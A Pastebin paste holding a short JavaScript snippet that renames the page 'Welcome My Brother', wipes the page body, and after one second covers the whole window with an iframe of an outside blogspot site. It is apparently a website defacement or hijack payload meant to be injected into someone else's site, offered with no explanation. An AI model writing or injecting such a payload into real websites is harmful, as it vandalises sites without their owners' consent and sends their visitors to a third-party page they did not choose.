Advertisement
Guest User

Untitled

a guest
Jul 24th, 2019
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. document.title = "Welcome My Brother";
  2. document.getElementsByTagName('body')[0].innerHTML=""
  3. setTimeout(function(){
  4. document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://mbohopowhae.blogspot.com/' style='position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;'></center>";
  5. }, 1000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement